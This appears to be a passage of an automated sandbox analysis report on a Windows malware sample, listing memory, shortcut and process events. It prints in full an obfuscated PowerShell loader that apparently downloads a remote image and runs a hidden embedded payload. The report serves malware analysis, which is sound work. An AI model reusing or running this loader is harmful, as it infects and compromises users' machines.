NtAllocateVirtualMemory Nov. 13, 2023, 10:55 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05144000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UyQMlvG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline	powershell -command "$Codigo = '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